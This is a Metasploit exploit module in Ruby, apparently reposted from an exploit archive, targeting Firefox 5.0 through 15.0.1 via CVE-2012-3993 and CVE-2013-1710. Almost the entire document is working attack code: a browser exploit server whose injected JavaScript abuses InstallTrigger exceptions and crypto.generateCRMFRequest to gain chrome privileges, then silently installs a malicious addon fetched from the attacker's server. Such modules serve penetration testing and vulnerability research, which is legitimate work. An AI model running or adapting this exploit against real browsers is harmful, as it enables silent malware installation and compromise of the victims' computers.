Firefox 15.0.1 Code Execution
Source: metasploit.com  Author: joev  Published: 2013-12-24
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::FirefoxAddonGenerator

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
      'Description'    => %q{
        On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
        invalid input, would throw an exception that did not have an __exposedProps__
        property set. By re-setting this property on the exception object's prototype,
        the chrome-based defineProperty method is made available.

        With the defineProperty method, functions belonging to window and document can be
        overridden with a function that gets called from chrome-privileged context. From here,
        another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
        into the context's private scope. Since the window does not have a chrome:// URL,
        the insecure parts of Components.classes are not available, so instead the AddonManager
        API is invoked to silently install a malicious plugin.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'Mariusz Mlynski', # discovered CVE-2012-3993
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'joev' # metasploit module
      ],
      'DisclosureDate' => "Aug 6 2013",
      'References' => [
        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
        ['OSVDB', '86111'],
        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
        ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)
        ['OSVDB', '96019']
      ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(5, 15) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    if request.uri.match(/\.xpi$/i)
      print_status("Sending the malicious addon")
      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
    else
      print_status("Sending HTML")
      send_response_html(cli, generate_html(target_info))
    end
  end

  def generate_html(target_info)
    injection = if target_info[:ua_ver].to_i == 15
      "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
    else
      "p2.constructor.defineProperty(obj,key,{get:runme});"
    end

    %Q|
      <html>
      <body>
      #{datastore['CONTENT']}
      <div id='payload' style='display:none'>
      if (!window.done){
        window.AddonManager.getInstallForURL(
          '#{get_module_uri}/addon.xpi',
          function(install) { install.install() },
          'application/x-xpinstall'
        );
        window.done = true;
      }
      </div>
      <script>
      try{InstallTrigger.install(0)}catch(e){p=e;};
      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
      p2.__exposedProps__={
        constructor:'rw',
        prototype:'rw',
        defineProperty:'rw',
        __exposedProps__:'rw'
      };
      var s = document.querySelector('#payload').innerHTML;
      var q = false;
      var register = function(obj,key) {
        var runme = function(){
          if (q) return;
          q = true;
          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
        };
        try {
          #{injection}
        } catch (e) {}
      };
      for (var i in window) register(window, i);
      for (var i in document) register(document, i);
      </script>
      </body>
      </html>
    |
  end
end